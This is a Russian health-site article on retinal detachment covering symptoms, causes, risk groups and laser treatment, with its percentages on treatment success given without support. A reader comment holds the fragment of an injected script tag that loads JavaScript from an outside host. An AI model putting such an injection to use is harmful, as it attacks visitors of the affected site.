Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Симптомы, которые нельзя ...  >>  Симптомы, которые нельзя пропустить. Пелена перед глазами.
 
Обратная связь
 

Симптомы, которые нельзя пропустить. Пелена перед глазами.

Размер шрифта
25 февраля 2011 00:01
  • google_analytics: false
  • Нравится

Зрение – один из самых дорогих подарков природы. Без него очень сложно жить. Но большинство из нас воспринимает его как должное, игнорируя даже очевидные признаки нездоровья глаз. Например, пелену перед глазами – симптом отслоения сетчатки, состояния, которое может привести к слепоте.

Алексей Фошкин/ «Здоровье-Инфо»

Передатчик изображения

Сетчатка – тончайший слой нервной ткани, который «устилает» внутреннюю поверхность глаза. Роговица и хрусталик проецируют на нее изображение, а она преобразует его в нервные импульсы, которые идут прямиком в мозг. Получив их серое вещество создает ту самую «картинку», которую мы видим.

Несмотря на то, что сетчатка хорошо спрятана внутри глаза, она не застрахована от разного рода неприятностей. Самое страшное, что может произойти – ее отслоение. Ткани, которые «отошли» от внутренней поверхности глазного яблока перестают получать полноценное питание и погибают. Пока «отклеившаяся» часть сетчатки умирает, мозг перестает получать часть импульсов, а у человека возникают проблемы со зрением, которые и являются симптомами отслоения.

«Симптомами отслойки сетчатки могут быть пелена наподобие облака или завесы, – рассказывает Мария Трубилина, к.м.н., медицинский директор компании «Эссилор Оптика». – Время от времени человек может видеть искры и яркие вспышки света прямо перед глазами». Эти «оптические эффекты» говорят о том, что ткани уже отошли, но еще живы. И необходимо срочно обратиться за помощью. 80% операций, проведенных в первые 14 дней, после образования недуга, заканчиваются удачно, в этом случае зрение восстанавливается почти полностью (некоторые потери есть, но они не существенны). Через две недели шансы на полное выздоровление уменьшаются день ото дня в геометрической прогрессии. Чем дольше игнорировать недуг и не обращаться к офтальмологу, тем больше вероятность ослепнуть.

Кроме пелены перед глазами и ярких вспышек, возможны и другие симптомы:

  • понижение зрения
  • внезапная утрата бокового зрения
  • крупные помутнения, пятна, которые перемещаются по всей «картинке»
  • общая размытость изображения, проблемы с фокусированием

Запомните, что практически любое изменение в «картинке», которую вы видите (даже самые пустяковые) – повод обратиться к врачу. Без медицинской помощи, сама собой сетчатка не встанет на место.

 

Причинно-следственные связи

Сахарный диабет один из самых сильных «провокаторов» отслоения сетчатки. При диабете в глазу вырастают очень хрупкие кровеносные сосуды, которые плохо питают клетки сетчатки и легко «лопаются». С одной стороны это приводит к дистрофии тканей, а с другой, кровь, вытекшая из «лопнувшего» сосуда может стать той жидкостью, которая отслаивает сетчатку.

«Причинами отслойки сетчатки могут быть ее дистрофия (то есть истончение), нарушение обменных процессов, средняя и высокая степень близорукости, сахарный диабет, – утверждает Мария Трубилина, к.м.н., медицинский директор компании «Эссилор Оптика». – Патология сетчатки может возникнуть при травмах глаза, гипертонической болезни, заболеваниях надпочечников, щитовидной железы, ревматоидном артрите и других заболеваниях».

Сетчатка становится тоньше (то есть начинается состояние дистрофии) в двух случаях:

  1. при близорукости, так как из-за этой болезни меняется форма глазного яблока, вследствие чего в некоторых местах сетчатка, покрывающая его изнутри, растягивается и деформируется
  2. когда ткани получают недостаточно питательных веществ из крови. Причиной может быть любое заболевание, влияющее на работоспособность сердечно-сосудистой системы и приводящее к тому, что кровь в недостаточном количестве поступает к органам

В местах, где сетчатка истончилась, могут появиться трещинки и разрывы. В них затекает жидкость – кровь или стекловидное тело (гелеобразная субстанция, которая наполняет глаз). Эта влага просачивается через трещинку под сетчатку, приподнимая ее. Так и происходит отслоение. От него не застрахован никто, поэтому необходимо регулярно проверять свои глаза. «На начальных стадиях отслоения сетчатки явных признаков может и не быть. Поэтому необходимо раз в год обязательно консультироваться с офтальмологом, советует Мария Трубилина, к.м.н., медицинский директор компании «Эссилор Оптика». – А если у вас имеются близорукость, сахарный диабет и другие вышеперечисленные заболевания, то консультацию офтальмолога надо получать один раз в полгода».

Лечение

Избавиться от отслоения сетчатки можно с помощью «биологической сварки» – безболезненной процедуры, в ходе которой лазерный луч направляется прямо на сетчатку и «приваривает» отслоившиеся ткани. Жидкость, которая скопилась под ними, рассасывается после операции. Длительность «биологической сварки» от 30 до 50 минут, она делается амбулаторно. При своевременном обращении и тщательной диагностике (важно, чтобы врач сумел обнаружить не только «отошедшую» часть сетчатки, но и трещинку, которая вызвала протечку), зрение может восстановиться на 98%.

Отслоение сетчатки – заболевание, которое, не останавливаясь, идет до конца. Если не лечить его, оно обязательно приведет к слепоте.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:19

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.